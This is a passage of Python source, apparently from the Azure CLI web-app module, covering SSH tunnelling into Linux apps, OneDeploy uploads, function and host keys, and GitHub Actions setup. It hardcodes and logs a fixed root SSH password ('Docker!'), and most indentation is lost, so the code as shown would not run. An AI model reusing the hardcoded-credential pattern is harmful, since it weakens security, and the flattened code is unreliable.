# wake up kudu, by making an SCM call
import requests
    # workaround until the Linux timeout-limits issue is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def perform_onedeploy(cmd,
resource_group_name,
name,
src_path=None,
src_url=None,
target_path=None,
artifact_type=None,
is_async=None,
restart=None,
clean=None,
ignore_stack=None,
timeout=None,
slot=None):
params = OneDeployParams()
params.cmd = cmd
params.resource_group_name = resource_group_name
params.webapp_name = name
params.src_path = src_path
params.src_url = src_url
params.target_path = target_path
params.artifact_type = artifact_type
params.is_async_deployment = is_async
params.should_restart = restart
params.is_clean_deployment = clean
params.should_ignore_stack = ignore_stack
params.timeout = timeout
params.slot = slot
return _perform_onedeploy_internal(params)
# Class for OneDeploy parameters
# pylint: disable=too-many-instance-attributes,too-few-public-methods
class OneDeployParams:
def __init__(self):
self.cmd = None
self.resource_group_name = None
self.webapp_name = None
self.src_path = None
self.src_url = None
self.artifact_type = None
self.is_async_deployment = None
self.target_path = None
self.should_restart = None
self.is_clean_deployment = None
self.should_ignore_stack = None
self.timeout = None
self.slot = None
# pylint: enable=too-many-instance-attributes,too-few-public-methods
def _build_onedeploy_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
deploy_url = scm_url + '/api/publish?type=' + params.artifact_type
if params.is_async_deployment is not None:
deploy_url = deploy_url + '&async=' + str(params.is_async_deployment)
if params.should_restart is not None:
deploy_url = deploy_url + '&restart=' + str(params.should_restart)
if params.is_clean_deployment is not None:
deploy_url = deploy_url + '&clean=' + str(params.is_clean_deployment)
if params.should_ignore_stack is not None:
deploy_url = deploy_url + '&ignorestack=' + str(params.should_ignore_stack)
if params.target_path is not None:
deploy_url = deploy_url + '&path=' + params.target_path
return deploy_url
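# Illustrative sketch (hypothetical host and flags): a URL of the kind produced
# by _build_onedeploy_url above, assuming the typical *.scm.azurewebsites.net
# Kudu endpoint.
def _example_onedeploy_url_shape():
    url = ('https://myapp.scm.azurewebsites.net/api/publish?type=zip'
           '&async=True&restart=False&clean=True')
    assert '?type=zip' in url and '&async=True' in url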
def _get_onedeploy_status_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
return scm_url + '/api/deployments/latest'
def _get_basic_headers(params):
import urllib3
user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name,
params.webapp_name, params.slot)
if params.src_path:
content_type = 'application/octet-stream'
elif params.src_url:
content_type = 'application/json'
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
headers['Content-Type'] = content_type
return headers
def _get_onedeploy_request_body(params):
import os
if params.src_path:
logger.info('Deploying from local path: %s', params.src_path)
try:
with open(os.path.realpath(os.path.expanduser(params.src_path)), 'rb') as fs:
body = fs.read()
except Exception as e: # pylint: disable=broad-except
raise CLIError("Either '{}' is not a valid local file path or you do not have permissions to access it"
.format(params.src_path)) from e
elif params.src_url:
logger.info('Deploying from URL: %s', params.src_url)
body = json.dumps({
"packageUri": params.src_url
})
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
return body
def _update_artifact_type(params):
import ntpath
if params.artifact_type is not None:
return
# Interpret deployment type from the file extension if the type parameter is not passed
file_name = ntpath.basename(params.src_path)
    file_extension = file_name.split(".", 1)[1] if "." in file_name else ""  # guard against extension-less paths
if file_extension in ('war', 'jar', 'ear', 'zip'):
params.artifact_type = file_extension
elif file_extension in ('sh', 'bat'):
params.artifact_type = 'startup'
else:
params.artifact_type = 'static'
logger.warning("Deployment type: %s. To override deloyment type, please specify the --type parameter. "
"Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type)
def _make_onedeploy_request(params):
import requests
from azure.cli.core.util import (
should_disable_connection_verify,
)
# Build the request body, headers, API URL and status URL
body = _get_onedeploy_request_body(params)
headers = _get_basic_headers(params)
deploy_url = _build_onedeploy_url(params)
deployment_status_url = _get_onedeploy_status_url(params)
logger.info("Deployment API: %s", deploy_url)
response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify())
    # Polling the deployment status below effectively turns the async deployment
    # into a synchronous one. This is currently always enabled.
    poll_async_deployment_for_debugging = True
# check the status of async deployment
if response.status_code == 202 or response.status_code == 200:
response_body = None
if poll_async_deployment_for_debugging:
logger.info('Polling the status of async deployment')
response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name,
deployment_status_url, headers, params.timeout)
logger.info('Async deployment complete. Server response: %s', response_body)
return response_body
# API not available yet!
if response.status_code == 404:
raise CLIError("This API isn't available in this environment yet!")
# check if there's an ongoing process
if response.status_code == 409:
raise CLIError("Another deployment is in progress. Please wait until that process is complete before "
"starting a new deployment. You can track the ongoing deployment at {}"
.format(deployment_status_url))
    # check if an error occurred during deployment
    if response.status_code:
        raise CLIError("An error occurred during deployment. Status Code: {}, Details: {}"
                       .format(response.status_code, response.text))
# OneDeploy
def _perform_onedeploy_internal(params):
# Update artifact type, if required
_update_artifact_type(params)
# Now make the OneDeploy API call
logger.info("Initiating deployment")
response = _make_onedeploy_request(params)
logger.info("Deployment has completed successfully")
return response
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
try:
c.run('cat /etc/motd', pty=True)
except invoke.exceptions.UnexpectedExit:
# Don't crash over a non-existing /etc/motd.
pass
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise ValidationError("Only Linux App Service Plans supported, found a Windows App Service Plan")
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
if not instance:
open_page_in_browser(scm_url + '/webssh/host')
else:
open_page_in_browser(scm_url + '/webssh/host?instance={}'.format(instance))
else:
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise ValidationError('Remote debugging is enabled, please disable')
create_tunnel_and_session(
cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and (hostname_binding.host_name_type == 'Verified' or
hostname_binding.host_name_type == 'Managed'):
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot, key=key_info)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name, key=key_info)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot)
return client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name)
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
key_info)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
key_info)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_function_secret_slot(resource_group_name, name, function_name, key_name, slot)
return client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name)
def add_github_actions(cmd, resource_group, name, repo, runtime=None, token=None, slot=None, # pylint: disable=too-many-statements,too-many-branches
branch='master', login_with_github=False, force=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
    # name_available means no such app exists; reason == 'Invalid' means the name itself is malformed
    if site_availability.name_available or site_availability.reason == 'Invalid':
raise ResourceNotFoundError(
"The Resource 'Microsoft.Web/sites/%s' under resource group '%s' "
"was not found." % (name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise ResourceNotFoundError(
"Unable to retrieve details of the existing app %s. Please check that the app is a part of "
"the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise ResourceNotFoundError("The webapp %s exists in ResourceGroup %s and does not match the "
"value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
parsed_plan_id = parse_resource_id(app_details.server_farm_id)
client = web_client_factory(cmd.cli_ctx)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
is_linux = plan_info.reserved
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Verify runtime
app_runtime_info = _get_app_runtime_info(
cmd=cmd, resource_group=resource_group, name=name, slot=slot, is_linux=is_linux)
app_runtime_string = None
    if app_runtime_info and app_runtime_info['display_name']:
app_runtime_string = app_runtime_info['display_name']
github_actions_version = None
if (app_runtime_info and app_runtime_info['github_actions_version']):
github_actions_version = app_runtime_info['github_actions_version']
if runtime and app_runtime_string:
if app_runtime_string.lower() != runtime.lower():
            logger.warning('The app runtime: %s does not match the runtime specified: '
                           '%s. Using the specified runtime %s.', app_runtime_string, runtime, runtime)
app_runtime_string = runtime
elif runtime:
app_runtime_string = runtime
if not app_runtime_string:
raise CLIError('Could not detect runtime. Please specify using the --runtime flag.')
if not _runtime_supports_github_actions(runtime_string=app_runtime_string, is_linux=is_linux):
raise CLIError("Runtime %s is not supported for GitHub Actions deployments." % app_runtime_string)
# Get workflow template
logger.warning('Getting workflow template using runtime: %s', app_runtime_string)
workflow_template = _get_workflow_template(github=g, runtime_string=app_runtime_string, is_linux=is_linux)
# Fill workflow template
guid = str(uuid.uuid4()).replace('-', '')
publish_profile_name = "AzureAppService_PublishProfile_{}".format(guid)
logger.warning(
'Filling workflow template with name: %s, branch: %s, version: %s, slot: %s',
name, branch, github_actions_version, slot if slot else 'production')
completed_workflow_file = _fill_workflow_template(content=workflow_template.decoded_content.decode(), name=name,
branch=branch, slot=slot, publish_profile=publish_profile_name,
version=github_actions_version)
completed_workflow_file = completed_workflow_file.encode()
# Check if workflow exists in repo, otherwise push
if slot:
file_name = "{}_{}({}).yml".format(branch.replace('/', '-'), name.lower(), slot)
else:
file_name = "{}_{}.yml".format(branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "/{}/{}".format(dir_path, file_name)
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
if existing_publish_profile_name:
completed_workflow_file = completed_workflow_file.decode()
completed_workflow_file = completed_workflow_file.replace(
publish_profile_name, existing_publish_profile_name)
completed_workflow_file = completed_workflow_file.encode()
publish_profile_name = existing_publish_profile_name
logger.warning("Existing workflow file found")
if force:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha, branch=branch)
else:
option = prompt_y_n('Replace existing workflow file?')
if option:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha,
branch=branch)
else:
logger.warning("Use the existing workflow file")
if existing_publish_profile_name:
publish_profile_name = existing_publish_profile_name
except UnknownObjectException:
logger.warning("Creating new workflow file: %s", file_path)
github_repo.create_file(path=file_path, message="Create workflow using Azure CLI",
content=completed_workflow_file, branch=branch)
# Add publish profile to GitHub
logger.warning('Adding publish profile to GitHub')
_add_publish_profile_to_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo,
token=token, github_actions_secret_name=publish_profile_name,
slot=slot)
# Set site source control properties
_update_site_source_control_properties_for_gh_action(
cmd=cmd, resource_group=resource_group, name=name, token=token, repo=repo, branch=branch, slot=slot)
github_actions_url = "https://github.com/{}/actions".format(repo)
return github_actions_url
def remove_github_actions(cmd, resource_group, name, repo, token=None, slot=None, # pylint: disable=too-many-statements
branch='master', login_with_github=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
    if site_availability.name_available or site_availability.reason == 'Invalid':
raise CLIError("The Resource 'Microsoft.Web/sites/%s' under resource group '%s' was not found." %
(name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app %s. "
"Please check that the app is a part of the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise CLIError("The webapp %s exists in ResourceGroup %s and does not match "
"the value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
repo = repo.strip().rstrip('/')  # normalize the repo id and drop any trailing slash safely
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data.get('message'):
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data.get('message'):
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Check if workflow exists in repo and remove
file_name = "{}_{}({}).yml".format(
branch.replace('/', '-'), name.lower(), slot) if slot else "{}_{}.yml".format(
branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "/{}/{}".format(dir_path, file_name)
existing_publish_profile_name = None
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
logger.warning("Removing the existing workflow file")
github_repo.delete_file(path=file_path, message="Removing workflow file, disconnecting github actions",
sha=existing_workflow_file.sha, branch=branch)
except UnknownObjectException as e:
error_msg = "Error when removing workflow file."
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Remove publish profile from GitHub
if existing_publish_profile_name:
logger.warning('Removing publish profile from GitHub')
_remove_publish_profile_from_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo, token=token,
github_actions_secret_name=existing_publish_profile_name, slot=slot)
# Remove site source control properties
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
return "Disconnected successfully."
def _get_publish_profile_from_workflow_file(workflow_file):
import re
publish_profile = None
regex = re.search(r'publish-profile: \$\{\{ secrets\..*?\}\}', workflow_file)
if regex:
publish_profile = regex.group()
publish_profile = publish_profile.replace('publish-profile: ${{ secrets.', '')
publish_profile = publish_profile[:-2]
if publish_profile:
return publish_profile.strip()
return None
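# Minimal sketch (added for illustration): what _get_publish_profile_from_workflow_file
# extracts. The one-line workflow fragment below is hypothetical.
#
#   sample = 'publish-profile: ${{ secrets.MYAPP_PUBLISH_PROFILE }}'
#   assert _get_publish_profile_from_workflow_file(sample) == 'MYAPP_PUBLISH_PROFILE'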
def _update_site_source_control_properties_for_gh_action(cmd, resource_group, name, token, repo=None,
branch="master", slot=None):
if repo:
repo_url = 'https://github.com/' + repo
else:
repo_url = None
site_source_control = show_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
if site_source_control:
if not repo_url:
repo_url = site_source_control.repo_url
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
config_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
repo_url=repo_url,
repository_type='github',
github_action=True,
branch=branch,
git_token=token,
slot=slot)
def _get_workflow_template(github, runtime_string, is_linux):
from github import GithubException
from github.GithubException import BadCredentialsException
file_contents = None
template_repo_path = 'Azure/actions-workflow-templates'
template_file_path = _get_template_file_path(runtime_string=runtime_string, is_linux=is_linux)
try:
template_repo = github.get_repo(template_repo_path)
file_contents = template_repo.get_contents(template_file_path)
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when retrieving workflow template"
if e.data and e.data.get('message'):
error_msg += ": {}".format(e.data['message'])
raise CLIError(error_msg)
return file_contents
def _fill_workflow_template(content, name, branch, slot, publish_profile, version):
if not slot:
slot = 'production'
content = content.replace('${web-app-name}', name)
content = content.replace('${branch}', branch)
content = content.replace('${slot-name}', slot)
content = content.replace('${azure-webapp-publish-profile-name}', publish_profile)
content = content.replace('${AZURE_WEBAPP_PUBLISH_PROFILE}', publish_profile)
content = content.replace('${dotnet-core-version}', version)
content = content.replace('${java-version}', version)
content = content.replace('${node-version}', version)
content = content.replace('${python-version}', version)
return content
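# Illustrative sketch (added): the placeholder rewriting done by _fill_workflow_template,
# with hypothetical values. Note that a falsy slot becomes 'production'.
#
#   template = 'app: ${web-app-name} branch: ${branch} slot: ${slot-name}'
#   _fill_workflow_template(template, 'mysite', 'master', None, 'PROFILE', '3.8')
#   # -> 'app: mysite branch: master slot: production'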
def _get_template_file_path(runtime_string, is_linux):
if not runtime_string:
raise CLIError('Unable to retrieve workflow template')
runtime_string = runtime_string.lower()
runtime_stack = runtime_string.split('|')[0]
template_file_path = None
if is_linux:
template_file_path = LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
else:
# Handle java naming: the runtime string looks like 'java|<version>|<container>|<container version>'
if runtime_stack == 'java':
java_container_split = runtime_string.split('|')
if len(java_container_split) > 2:  # the container name sits at index 2, so require at least three fields
if java_container_split[2] == 'tomcat':
runtime_stack = 'tomcat'
elif java_container_split[2] == 'java se':
runtime_stack = 'java'
template_file_path = WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
if not template_file_path:
raise CLIError('Unable to retrieve workflow template.')
return template_file_path
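# Illustrative note (added): for Windows Java apps the runtime string is expected to
# look like 'java|<version>|<container>|<container version>'; the hypothetical
# 'java|1.8|tomcat|9.0' therefore resolves to the 'tomcat' template key:
#
#   assert _get_template_file_path('java|1.8|tomcat|9.0', is_linux=False) == \
#       WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH['tomcat']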
def _add_publish_profile_to_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
# Get publish profile with secrets
import requests
logger.warning("Fetching publish profile with secrets for the app '%s'", name)
publish_profile_bytes = _generic_site_operation(
cmd.cli_ctx, resource_group, name, 'list_publishing_profile_xml_with_secrets',
slot, {"format": "WebDeploy"})
publish_profile = list(publish_profile_bytes)
if publish_profile:
publish_profile = publish_profile[0].decode('ascii')
else:
raise CLIError('Unable to retrieve publish profile.')
# Add publish profile with secrets as a GitHub Actions Secret in the repo
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
headers['Content-Type'] = 'application/json'
headers['Accept'] = 'application/json'
public_key_url = "https://api.github.com/repos/{}/actions/secrets/public-key".format(repo)
public_key = requests.get(public_key_url, headers=headers)
if not public_key.ok:
raise CLIError('Request to GitHub for public key failed.')
public_key = public_key.json()
encrypted_github_actions_secret = _encrypt_github_actions_secret(public_key=public_key['key'],
secret_value=str(publish_profile))
payload = {
"encrypted_value": encrypted_github_actions_secret,
"key_id": public_key['key_id']
}
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
stored_secret = requests.put(store_secret_url, data=json.dumps(payload), headers=headers)
if not 200 <= stored_secret.status_code < 300:
raise CLIError('Unable to add publish profile to GitHub. Request status code: %s' % stored_secret.status_code)
def _remove_publish_profile_from_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
import requests
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
requests.delete(store_secret_url, headers=headers)
def _runtime_supports_github_actions(runtime_string, is_linux):
if is_linux:
stacks = get_file_json(RUNTIME_STACKS)['linux']
else:
stacks = get_file_json(RUNTIME_STACKS)['windows']
# Return as soon as a matching stack advertises GitHub Actions support
for stack in stacks:
if stack['displayName'].lower() == runtime_string.lower():
if 'github_actions_properties' in stack and stack['github_actions_properties']:
return True
return False
def _get_app_runtime_info(cmd, resource_group, name, slot, is_linux):
app_settings = None
app_runtime = None
if is_linux:
app_metadata = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime = getattr(app_metadata, 'linux_fx_version', None)
return _get_app_runtime_info_helper(app_runtime, "", is_linux)
app_metadata = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'list_metadata', slot)
app_metadata_properties = getattr(app_metadata, 'properties', {})
if 'CURRENT_STACK' in app_metadata_properties:
app_runtime = app_metadata_properties['CURRENT_STACK']
if app_runtime and app_runtime.lower() == 'node':
app_settings = get_app_settings(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
for app_setting in app_settings:
if 'name' in app_setting and app_setting['name'] == 'WEBSITE_NODE_DEFAULT_VERSION':
app_runtime_version = app_setting['value'] if 'value' in app_setting else None
if app_runtime_version:
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'python':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = getattr(app_settings, 'python_version', '')
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'dotnetcore':
# the dotnetcore version is not exposed via site config or metadata, so leave it empty
app_runtime_version = ""
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'java':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = "{java_version}, {java_container}, {java_container_version}".format(
java_version=getattr(app_settings, 'java_version', '').lower(),
java_container=getattr(app_settings, 'java_container', '').lower(),
java_container_version=getattr(app_settings, 'java_container_version', '').lower()
)
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
def _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux):
if is_linux:
stacks = get_file_json(RUNTIME_STACKS)['linux']
for stack in stacks:
if 'github_actions_properties' in stack and stack['github_actions_properties']:
if stack['displayName'].lower() == app_runtime.lower():
return {
"display_name": stack['displayName'],
"github_actions_version": stack['github_actions_properties']['github_actions_version']
}
else:
